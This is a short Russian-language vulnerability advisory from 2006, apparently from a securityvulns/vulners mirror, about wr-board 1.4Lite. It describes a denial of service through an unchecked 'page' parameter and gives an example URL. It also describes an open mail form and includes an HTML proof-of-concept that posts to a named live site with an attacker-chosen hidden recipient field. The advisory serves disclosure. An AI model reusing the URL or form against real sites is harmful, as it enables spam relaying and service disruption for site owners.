Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15200
HistoryNov 23, 2006 - 12:00 a.m.

уязвимости скриптов с www.wr-script.ru (wr-board 1.4Lite)

2006-11-2300:00:00
vulners.com
108

1) DoS. Не проверяется значение параметра page в index.php
http://wr-script.host/board/index.php?event=list&id=112420973596&page=-10000000000000000
2) Открытая почтовая форма. Адрес по которому будет отправлено сообщение с доски передается в поле uemail (hidden).
Пример использования:

<html><head><title>Отправление сообщения автору объявления</title></head><body>
<center><TABLE bgColor=#aaaaaa cellPadding=2 cellSpacing=1>
<FORM action='http://www.voshod.dp.ua/tools.php?event=mailtogo&#39; method=post>
<TBODY><TR><TD align=middle bgColor=#cccccc colSpan=2>Отправка сообщения <B></B></TD></TR>

<TR bgColor=#ffffff><TD>Ваше имя:<FONT color=#ff0000>*</FONT><BR></TD>
<TD><INPUT name=name style='FONT-SIZE: 14px; WIDTH: 250px'></TD></TR>

<TR bgColor=#ffffff><TD>Ваш E-mail:<FONT color=#ff0000>*</FONT></TD>
<TD><INPUT name=email style='FONT-SIZE: 14px; WIDTH: 250px'></TD></TR>

<TR bgColor=#ffffff><TD>Сообщение:<FONT color=#ff0000>*</FONT></TD>
<TD><TEXTAREA name=msg style='FONT-SIZE: 14px; HEIGHT: 250px; WIDTH: 250px'></TEXTAREA></TD></TR>
<INPUT type=hidden name=uemail [email protected]><INPUT type=hidden name=uname value="nikto"><INPUT type=hidden
name=id value=0><INPUT type=hidden name=fid value=0><input type=hidden name=add value="index.php"><TR><TD
bgColor=#FFFFFF colspan=2><center><INPUT type=submit value=Отправить></TD></TR></TBODY></TABLE>
</FORM>